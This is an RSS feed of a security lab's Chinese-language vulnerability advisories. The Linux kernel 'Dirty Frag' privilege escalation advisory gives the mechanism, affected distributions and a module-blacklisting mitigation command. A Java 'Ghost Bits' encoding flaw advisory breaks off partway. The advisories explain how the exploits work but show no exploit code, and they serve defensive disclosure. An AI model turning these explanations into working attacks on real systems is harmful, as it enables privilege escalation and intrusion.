<?xml version="1.0" encoding="UTF-8"?><rss version="2.0" xmlns:content="http://purl.org/rss/1.0/modules/content/">
  <channel>
    <title>天融信阿尔法实验室</title>
    <link>https://wechat2rss.xlab.app/feed/a9cfdddef757b0ebac0428f629869b69028c43fa.xml</link>
    <description>天融信阿尔法实验室将不定期推出技术研究新方向成果，专注安全攻防前沿技术&#xA;(wechat feed made by @ttttmr https://wechat2rss.xlab.app)</description>
    <managingEditor> (天融信阿尔法实验室)</managingEditor>
    <image>
      <url>https://wx.qlogo.cn/mmhead/Q3auHgzwzM7BcpbVhdGzLaXuSfCBg1ibBPaUxKfWoowOeEI1kibicrpHw/0</url>
      <title>天融信阿尔法实验室</title>
      <link>https://wechat2rss.xlab.app/feed/a9cfdddef757b0ebac0428f629869b69028c43fa.xml</link>
    </image>
    <item>
      <title>【风险提示】天融信关于Linux Kernel本地权限提升漏洞Dirty Frag的风险提示</title>
      <link>https://mp.weixin.qq.com/s?__biz=Mzg3MDAzMDQxNw==&amp;mid=2247496708&amp;idx=1&amp;sn=d371ec89db29d4d25db8e5dd5d339c2c</link>
      <description>近日，天融信阿尔法实验室监测到Linux Kernel主线修复了一个本地权限提升漏洞Dirty Frag。该漏洞已存在9年，影响几乎所有主流企业级和桌面Linux发行版。由于该漏洞是一个逻辑漏洞，因此漏洞利用成功率极高。当前，此漏洞的细节及Exp已经公开。</description>
      <content:encoded><![CDATA[<p><span>天融信应急响应</span> <span>2026-05-08 12:37</span> <span style="display: inline-block;">北京</span></p>






  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=60892a2f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FTWq54w4h0qSDwnL7UseCicciccIIIfpUTSx3BZzcPCUdIcQ04vQumtt9sm8l9icCmVHtWq6FT5zibib0VAhNfiaUXGQIYLJvhd9r3DdAEicgib7UdTc%2F0%3Fwx_fmt%3Djpeg"/></p>
  <p>近日，天融信阿尔法实验室监测到Linux Kernel主线修复了一个本地权限提升漏洞Dirty Frag。该漏洞已存在9年，影响几乎所有主流企业级和桌面Linux发行版。由于该漏洞是一个逻辑漏洞，因此漏洞利用成功率极高。当前，此漏洞的细节及Exp已经公开。</p>
  <p style="text-align: center;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.4046875" data-s="300,640" data-type="png" data-w="1280" style="width:578px;height:234px;" type="block" data-croporisrc="https://mmbiz.qpic.cn/sz_mmbiz_png/H6W1QCHf9dHGTzEB1OhEu0PWb5DLcoKdib3G0a8cribUdnl1QUL8PLLpt4W4iaKsBAPDHwAW2zVDkv0ibQjW0lddlw/0?wx_fmt=png" data-cropx2="1280" data-cropy1="75.29411764705883" data-cropy2="593.4948096885813" data-imgfileid="100008572" src="https://wechat2rss.xlab.app/img-proxy/?k=e1895bcf&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FTWq54w4h0qTBZVpuwzKeVuenmiaibp0IMYuziaGwSbeQZelG0Jefqtsw1AIpTLiaus50eJwta77F3va4FHvg4jsmxMS6lZa6FxgiaibIjdue335ok%2F640%3Fwx_fmt%3Djpeg"/></p><p style="margin-bottom: 0px;white-space: normal;"><strong style="color: rgb(62, 62, 62);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;letter-spacing: 0.544px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span style="max-width: 100%;font-size: 24px;line-height: 36px;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span leaf="">0x00 背景介绍</span></span></strong><span leaf=""><br/></span></p><hr style="white-space: normal;color: rgb(62, 62, 62);letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;max-width: 100%;background-color: rgb(255, 255, 255);box-sizing: border-box !important;"/><p style="color: rgb(53, 53, 53);font-family: &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei&#34;, 黑体, Arial, sans-serif;font-size: 14px;text-align: left;white-space: normal;background-color: rgb(255, 255, 255);margin-bottom: 0px;"><span style="font-size: 14px;"><span style="font-size: 14px;"><span leaf=""><span textstyle="" style="font-size: 14px;">近日，天融信阿尔法实验室监测到Linux Kernel主线修复了一个本地权限提升漏洞Dirty Frag。该漏洞已存在9年，影响几乎所有主流企业级和桌面Linux发行版。由于该漏洞是一个逻辑漏洞，因此漏洞利用成功率极高。当前，此漏洞的细节及Exp已经公开，暂未发现主流发行版发布针对该问题的补丁或更新，因此，请受影响用户立即根据修复建议对该漏洞进行防御。</span></span></span></span></p><p style="margin-bottom: 0px;text-indent: 0em;white-space: normal;line-height: 25.5px;margin-top: 24px;"><strong style="color: rgb(62, 62, 62);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;letter-spacing: 0.54px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span style="max-width: 100%;font-size: 24px;line-height: 36px;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span leaf="">0x01 漏洞描述</span></span></strong></p><hr style="white-space: normal;color: rgb(62, 62, 62);letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;max-width: 100%;background-color: rgb(255, 255, 255);box-sizing: border-box !important;"/><p style="color: rgb(53, 53, 53);font-family: &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei&#34;, 黑体, Arial, sans-serif;font-size: 14px;text-align: left;white-space: normal;background-color: rgb(255, 255, 255);margin-bottom: 8px;"><span leaf=""><span textstyle="" style="font-size: 14px;">Linux内核是一个开源、宏内核但支持动态模块加载的操作系统核心，负责管理硬件资源并为上层软件提供运行环境。它通过进程调度、内存管理、虚拟文件系统、网络协议栈和设备驱动等关键子系统，实现对CPU、内存、磁盘及外设的抽象与调度，并提供稳定、安全和高效的接口供应用程序使用。凭借高可移植性、丰富的驱动支持和强大的社区协作，其已成为从嵌入式设备到超级计算机、从安卓系统到云服务器广泛采用的基础核心。</span></span></p><p style="color: rgb(53, 53, 53);font-family: &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei&#34;, 黑体, Arial, sans-serif;font-size: 14px;text-align: left;white-space: normal;background-color: rgb(255, 255, 255);margin-bottom: 8px;"><span leaf=""><span textstyle="" style="font-size: 14px;">Dirty Frag是Linux Kernel网络子系统中的一种漏洞类别，其通过链接xfrm-ESP Page-Cache Write漏洞和RxRPC Page-Cache Write漏洞在大多数Linux发行版上获得root权限。Dirty Frag与Dirty Pipe和Copy Fail的形成原因具有高度的相似性，但具体细节不同。</span></span></p><p style="color: rgb(53, 53, 53);font-family: &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei&#34;, 黑体, Arial, sans-serif;font-size: 14px;text-align: left;white-space: normal;background-color: rgb(255, 255, 255);margin-bottom: 8px;"><span leaf=""><span textstyle="" style="font-size: 14px;">这两个漏洞的共同之处在于，在零拷贝（zero-copy）发送路径中，当splice()函数将攻击者仅拥有读取权限的页面缓存页引用直接植入发送方skb的片段槽时，接收方内核代码会对该片段执行原地加密。结果，非特权用户仅拥有读取权限的文件（例如/etc/passwd或/usr/bin/su）的页面缓存会被修改，并且后续每次读取都会看到修改后的副本，从而实现提权。</span></span></p><p style="color: rgb(53, 53, 53);font-family: &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei&#34;, 黑体, Arial, sans-serif;font-size: 14px;text-align: left;white-space: normal;background-color: rgb(255, 255, 255);margin-bottom: 8px;"><span leaf=""><span textstyle="" style="font-size: 14px;">请注意，无论algif_aead模块是否可用，Dirty Frag漏洞都可能被触发。换句话说，即使在应用了公开已知的Copy Fail缓解措施（algif_aead黑名单）的系统上，您的Linux系统仍然容易受到Dirty Frag漏洞的攻击。</span></span></p><p data-pm-slice="0 0 []" style="margin-top: 0px;margin-bottom: 8px;"><span style="font-size: 14pt;"><span leaf=""><span textstyle="" style="font-size: 14px;">漏洞复现（复现环境</span></span><span lang="EN-US"><span leaf=""><span textstyle="" style="font-size: 14px;">Ubuntu 22.04.4 LTS</span></span></span><span leaf=""><span textstyle="" style="font-size: 14px;">）</span></span><span lang="EN-US"><span leaf=""><span textstyle="" style="font-size: 14px;">:</span></span></span></span></p><p style="text-align: center;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.15826330532212884" data-s="300,640" data-type="png" data-w="714" data-croporisrc="https://mmbiz.qpic.cn/sz_mmbiz_png/TWq54w4h0qSmpHMvgkL9ick1k3YzK14t6z4mknTGKZp4TUNzA7Fgpo7OrA7WIS4Nzld3hc83viaz5NicgjkcbyvRpBUcSd86nlB1FAcuyw4yfY/0?wx_fmt=png&amp;from=appmsg" data-cropselx2="578" data-cropsely2="89" data-imgfileid="100013059" src="https://wechat2rss.xlab.app/img-proxy/?k=62775479&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FTWq54w4h0qSmpHMvgkL9ick1k3YzK14t6z4mknTGKZp4TUNzA7Fgpo7OrA7WIS4Nzld3hc83viaz5NicgjkcbyvRpBUcSd86nlB1FAcuyw4yfY%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="margin-bottom: 0px;margin-top: 24px;"><strong style="color: rgb(62, 62, 62);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;letter-spacing: 0.54px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span style="max-width: 100%;font-size: 24px;line-height: 36px;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span leaf="">0x02 漏洞编号</span></span></strong></p><hr style="white-space: normal;color: rgb(62, 62, 62);letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;max-width: 100%;background-color: rgb(255, 255, 255);box-sizing: border-box !important;"/><p style="white-space: normal;margin-top: 16px;margin-bottom: 8px;text-align: justify;"><span style="color: rgb(0, 0, 0);font-size: 14px;letter-spacing: 0.476px;text-indent: 0em;"><span leaf="">暂无</span></span></p><p style="margin-top: 24px;margin-bottom: 0px;letter-spacing: 0.578px;text-wrap: wrap;"><strong style="color: rgb(62, 62, 62);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;letter-spacing: 0.54px;"><span style="font-size: 24px;line-height: 36px;"><span leaf="">0x03 漏洞等级</span></span></strong><span leaf=""><br/></span></p><hr style="text-wrap: wrap;color: rgb(62, 62, 62);letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;background-color: rgb(255, 255, 255);"/><p style="white-space: normal;margin-top: 16px;margin-bottom: 8px;text-align: justify;"><span style="color: rgb(0, 0, 0);font-size: 14px;letter-spacing: 0.476px;text-indent: 0em;"><span leaf="">高危</span></span></p><p style="margin-bottom: 0px;margin-top: 24px;"><strong style="color: rgb(62, 62, 62);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;letter-spacing: 0.54px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span style="max-width: 100%;font-size: 24px;line-height: 36px;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span leaf="">0x04 受影响版本</span></span></strong></p><hr style="white-space: normal;color: rgb(62, 62, 62);letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;max-width: 100%;background-color: rgb(255, 255, 255);box-sizing: border-box !important;"/><p style="white-space: normal;margin-top: 16px;margin-bottom: 16px;text-align: justify;"><span leaf=""><span textstyle="" style="font-size: 14px;">几乎影响所有主流企业级和桌面Linux发行版。</span></span></p><p style="line-height: 1em;margin-bottom: 8px;"><span leaf=""><span textstyle="" style="font-size: 14px;">xfrm-ESP Page-Cache Write漏洞影响范围：</span></span></p><p style="line-height: 1em;margin-bottom: 8px;"><span leaf=""><span textstyle="" style="font-size: 14px;">Linux Kernel主线Commit &gt;= cac2661c53f3（2017-01-17）</span></span></p><p style="line-height: 1em;margin-bottom: 8px;"><span leaf=""><span textstyle="" style="font-size: 14px;">RxRPC Page-Cache Write漏洞影响范围：</span></span></p><p style="line-height: 1em;margin-bottom: 16px;"><span leaf=""><span textstyle="" style="font-size: 14px;">Linux Kernel主线Commit &gt;= 2dc334f1a63a（2023-06-08）</span></span></p><p style="margin-bottom: 8px;"><span leaf=""><span textstyle="" style="font-size: 14px;">已知受影响的发行版：</span></span></p><p style="margin-bottom: 0px;line-height: 1.6em;"><span leaf=""><span textstyle="" style="font-size: 14px;">Ubuntu 22.04.4 LTS（6.8.0-40-generic）</span></span></p><p style="line-height: 1.6em;margin-bottom: 0px;"><span leaf=""><span textstyle="" style="font-size: 14px;">Ubuntu 24.04.4 LTS（6.17.0-23-generic）</span></span></p><p style="line-height: 1.6em;margin-bottom: 0px;"><span leaf=""><span textstyle="" style="font-size: 14px;">RHEL 10.1（6.12.0-124.49.1.el10_1.x86_64）</span></span></p><p style="line-height: 1.6em;margin-bottom: 0px;"><span leaf=""><span textstyle="" style="font-size: 14px;">openSUSE Tumbleweed（7.0.2-1-default）</span></span></p><p style="line-height: 1.6em;margin-bottom: 0px;"><span leaf=""><span textstyle="" style="font-size: 14px;">CentOS Stream 10（6.12.0-224.el10.x86_64）</span></span></p><p style="line-height: 1.6em;margin-bottom: 0px;"><span leaf=""><span textstyle="" style="font-size: 14px;">AlmaLinux 10（6.12.0-124.52.3.el10_1.x86_64）</span></span></p><p style="line-height: 1.6em;margin-bottom: 0px;"><span leaf=""><span textstyle="" style="font-size: 14px;">Fedora 44（6.19.14-300.fc44.x86_64）</span></span></p><p style="margin-top: 24px;margin-bottom: 0px;letter-spacing: 0.578px;"><strong style="color: rgb(62, 62, 62);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;letter-spacing: 0.54px;"><span style="font-size: 24px;line-height: 36px;"><span leaf="">0x05 修复建议</span></span></strong></p><hr style="color: rgb(62, 62, 62);letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;background-color: rgb(255, 255, 255);"/><p style="margin-top: 16px;margin-bottom: 8px;"><span style="font-size: 14px;"><span leaf="">Linux Kernel官方暂未发布正式补丁，可通过以下命令删除存在漏洞的内核模块，进行临时缓解。</span></span></p><p style="text-align: left;"><span leaf=""><span textstyle="" style="font-size: 14px;">sh -c &#34;printf &#39;install esp4 /bin/false\ninstall esp6 /bin/false\ninstall rxrpc /bin/false\n&#39; &gt; /etc/modprobe.d/dirtyfrag.conf; rmmod esp4 esp6 rxrpc 2&gt;/dev/null; true&#34;</span></span></p><h2 style="white-space: normal;color: rgb(62, 62, 62);line-height: 24px;letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;max-width: 100%;break-after: auto;background-color: rgb(255, 255, 255);margin-top: 24px;box-sizing: border-box !important;"><strong style="max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span style="max-width: 100%;font-size: 24px;line-height: 36px;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span leaf="">0x06 声明</span></span></strong></h2><hr style="white-space: normal;color: rgb(62, 62, 62);letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;max-width: 100%;background-color: rgb(255, 255, 255);box-sizing: border-box !important;"/><p style="color: rgb(53, 53, 53);font-family: &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei&#34;, 黑体, Arial, sans-serif;font-size: 14px;text-align: left;white-space: normal;background-color: rgb(255, 255, 255);margin-bottom: 0px;"><span leaf="">天融信阿尔法实验室拥有对此公告的修改和解释权，如欲转载，必须保证此公告的完整性。由于传播、利用此公告而造成的任何后果，均由使用者本人负责，天融信阿尔法实验室不为此承担任何责任。</span></p><div style="white-space: normal;margin-bottom: 0px;"><div style="margin: 30px 0% 10px;"><div style="display: inline-block;width: 100%;vertical-align: top;border-style: dashed;border-width: 2px;border-radius: 11px;border-color: rgb(141, 186, 190);padding: 10px;background-color: rgba(244, 242, 240, 0.6);"><div style="color: rgb(115, 120, 121);"><p><span style="font-size: 14px;"><span leaf="">天融信阿尔法实验室成立于2011年，一直以来，阿尔法实验室秉承“攻防一体”的理念，汇聚众多专业技术研究人员，从事攻防技术研究，在安全领域前瞻性技术研究方向上不断前行。作为天融信的安全产品和服务支撑团队，阿尔法实验室精湛的专业技术水平、丰富的排异经验，为天融信产品的研发和升级、承担国家重大安全项目和客户服务提供强有力的技术支撑。</span></span></p></div></div></div></div><div style="margin-bottom: 0px;"><div><div style="text-align: center;margin: 30px 0% 10px;"><div style="display: inline-block;width: 95%;vertical-align: top;box-shadow: rgb(185, 185, 185) 1.41421px 1.41421px 6px;padding: 5px;"><div><div style="margin: -20px 0% 5px;"><p style="vertical-align: middle;display: inline-block;box-shadow: rgb(0, 0, 0) 0px 0px 0px;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.06041666666666667" data-type="png" data-w="480" style="vertical-align: middle;width:auto !important;max-width:100% !important;height:auto !important;" data-imgfileid="100013023" src="https://wechat2rss.xlab.app/img-proxy/?k=5ba09fbc&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FH6W1QCHf9dGfIEDOlNXXDTqOpRkEkicJakNxM37lzr8eRJRibEfxkwBibg9KpVh6nibXHoG4xC6KyGFtTd4TOe6GyA%2F640%3Fwx_fmt%3Dpng"/></p></div></div><div><div style="margin: 10px 0%;"><div style="display: inline-block;vertical-align: middle;width: 38%;box-shadow: rgb(0, 0, 0) 0px 0px 0px;padding-left: 10px;"><div><div style="margin-top: 10px;margin-bottom: 10px;"><p style="vertical-align: middle;display: inline-block;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="1" data-type="jpeg" data-w="344" style="vertical-align: middle;width:auto !important;max-width:100% !important;height:auto !important;" data-imgfileid="100013022" src="https://wechat2rss.xlab.app/img-proxy/?k=33f7228b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FH6W1QCHf9dGfIEDOlNXXDTqOpRkEkicJawf8nKyKatopPJiaayibAUCvfTVFKfxVDInq2TiaUib6xhmhpLK4Zqscgyg%2F640%3Fwx_fmt%3Djpeg"/></p></div></div></div><div style="display: inline-block;vertical-align: middle;width: 61.8%;"><div><div><div style="font-size: 14px;"><p><span style="font-family:Optima-Regular, PingFangTC-light;"><span leaf="">天融信</span></span></p><p><span style="font-family:Optima-Regular, PingFangTC-light;"><span leaf="">阿尔法实验室</span></span></p></div></div></div><div><div style="margin: 10px 0%;"><div style="display: inline-block;box-shadow: rgb(183, 28, 28) 0px 0px 0px inset;border-style: solid;border-width: 1px;border-radius: 5px;border-color: rgb(66, 66, 66);padding: 5px;background-color: rgb(252, 228, 236);"><div><div style="text-align: left;color: rgb(131, 129, 129);padding-right: 8px;padding-left: 8px;font-size: 14px;"><p><span style="font-family: Optima-Regular, PingFangTC-light;"><span leaf="">长按二维码关注我们</span></span></p></div></div></div></div></div></div></div></div></div></div></div></div><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=1eb0780c&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzg3MDAzMDQxNw%3D%3D%26mid%3D2247496708%26idx%3D1%26sn%3Dd371ec89db29d4d25db8e5dd5d339c2c">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Fri, 08 May 2026 12:37:00 +0800</pubDate>
    </item>
    <item>
      <title>【风险提示】天融信关于Java Ghost Bits 漏洞的风险提示</title>
      <link>https://mp.weixin.qq.com/s?__biz=Mzg3MDAzMDQxNw==&amp;mid=2247496705&amp;idx=1&amp;sn=f6b76bcbd3beb393983e7cb3b4c0eea4</link>
      <description>近日，天融信阿尔法实验室监测到安全研究员披露了Java生态中的一种新型安全问题，通常被称为Ghost Bits（幽灵比特），其根源在于“字符视图”与“字节视图”不一致，可能引发部分安全防护产品绕过、路径穿越、文件上传绕过、CRLF 注入、反序列化绕过等风险。</description>
      <content:encoded><![CDATA[<p><span>天融信应急响应</span> <span>2026-04-30 18:12</span> <span style="display: inline-block;">北京</span></p>






  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=feb43455&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FTWq54w4h0qRMPq2VYbtxwpUCCL06Bz6f08p7LgndCaB7NGHt1osd1TDv2ibDN12foNkfKn5xS5TRtTwQFo1iasYfzlFaRTrH5cGYy2f5sd6KY%2F0%3Fwx_fmt%3Djpeg"/></p>
  <p>近日，天融信阿尔法实验室监测到安全研究员披露了Java生态中的一种新型安全问题，通常被称为Ghost Bits（幽灵比特），其根源在于“字符视图”与“字节视图”不一致，可能引发部分安全防护产品绕过、路径穿越、文件上传绕过、CRLF 注入、反序列化绕过等风险。</p>
  <p style="text-align: center;" nodeleaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-croporisrc="https://mmbiz.qpic.cn/mmbiz_png/TWq54w4h0qSV9hZUPsetrokELuYqr6XIiaSzCFy49VDpZcJ6k3icaGAn41PYNt5ZhRBcTq2mCoPoYWgrtMBG6ua3UaZgdnW5NVQW7r72n7KZg/0?wx_fmt=png&amp;from=appmsg" data-cropselx2="578" data-cropsely2="284" data-imgfileid="100013054" data-ratio="0.42634044768349816" data-s="300,640" data-w="1921" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=7f945da4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FTWq54w4h0qSV9hZUPsetrokELuYqr6XIiaSzCFy49VDpZcJ6k3icaGAn41PYNt5ZhRBcTq2mCoPoYWgrtMBG6ua3UaZgdnW5NVQW7r72n7KZg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="margin-bottom: 0px;white-space: normal;"><strong style="color: rgb(62, 62, 62);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;letter-spacing: 0.544px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span style="max-width: 100%;font-size: 24px;line-height: 36px;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span leaf="">0x00 背景介绍</span></span></strong><span leaf=""><br/></span></p><hr style="white-space: normal;color: rgb(62, 62, 62);letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;max-width: 100%;background-color: rgb(255, 255, 255);box-sizing: border-box !important;"/><p style="color: rgb(53, 53, 53);font-family: &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei&#34;, 黑体, Arial, sans-serif;font-size: 14px;text-align: left;white-space: normal;background-color: rgb(255, 255, 255);margin-bottom: 0px;"><span style="font-size: 14px;"><span style="font-size: 14px;"><span leaf="">近日，天融信阿尔法实验室监测到安全研究员披露了Java生态中的一种新型安全问题，通常被称为Ghost Bits（幽灵比特），其根源在于“字符视图”与“字节视图”不一致，可能引发部分安全防护产品绕过、路径穿越、文件上传绕过、CRLF 注入、反序列化绕过等风险。该问题不是单一 CVE，而是一类底层编码与解析逻辑缺陷，影响面较广，建议受影响用户尽快排查并修复。</span></span></span></p><p style="margin-bottom: 0px;text-indent: 0em;white-space: normal;line-height: 25.5px;margin-top: 24px;"><strong style="color: rgb(62, 62, 62);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;letter-spacing: 0.54px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span style="max-width: 100%;font-size: 24px;line-height: 36px;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span leaf="">0x01 漏洞描述</span></span></strong></p><hr style="white-space: normal;color: rgb(62, 62, 62);letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;max-width: 100%;background-color: rgb(255, 255, 255);box-sizing: border-box !important;"/><p style="color: rgb(53, 53, 53);font-family: &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei&#34;, 黑体, Arial, sans-serif;font-size: 14px;text-align: left;white-space: normal;background-color: rgb(255, 255, 255);margin-bottom: 8px;"><span leaf="">Java 是目前应用最广泛的编程语言之一，从 Web 服务器、企业应用到嵌入式系统都有其身影。Java 的类型系统中，char类型为 16 位 Unicode 代码单元，而byte类型仅为 8 位。当代码中发生char -&gt; byte的强制类型转换、位运算掩码、OutputStream.write(int)、DataOutputStream.writeBytes(String) 等时，高 8 位会被静默丢弃，只保留低 8 位，被丢弃的高位数据即被称为 &#34;Ghost Bits&#34;。</span></p><p style="color: rgb(53, 53, 53);font-family: &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei&#34;, 黑体, Arial, sans-serif;font-size: 14px;text-align: left;white-space: normal;background-color: rgb(255, 255, 255);margin-bottom: 8px;"><span leaf="">Ghost Bits 风险的核心在于，上层安全检查看到的字符串语义，与底层最终执行的字节语义可能不一致。上层按字符语义做校验时看到的是安全字符串，而底层按字节语义执行时，低 8 位可能折叠成危险的 ASCII 字节，从而触发真实漏洞。经过身份认证的攻击者可通过精心构造的 Unicode 字符输入，绕过业务校验、路径检查等安全机制，实现文件上传绕过、路径穿越、任意文件读取、认证绕过、SMTP 注入、HTTP 请求走私、Header 注入等多种攻击。该风险已在 Tomcat、Spring Framework、Jetty、Fastjson、Jackson、Openfire、Jira、Confluence 等多个主流 Java 组件中被证实存在实际可利用的漏洞。</span></p><p style="margin-bottom: 0px;margin-top: 24px;"><strong style="color: rgb(62, 62, 62);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;letter-spacing: 0.54px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span style="max-width: 100%;font-size: 24px;line-height: 36px;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span leaf="">0x02 漏洞编号</span></span></strong></p><hr style="white-space: normal;color: rgb(62, 62, 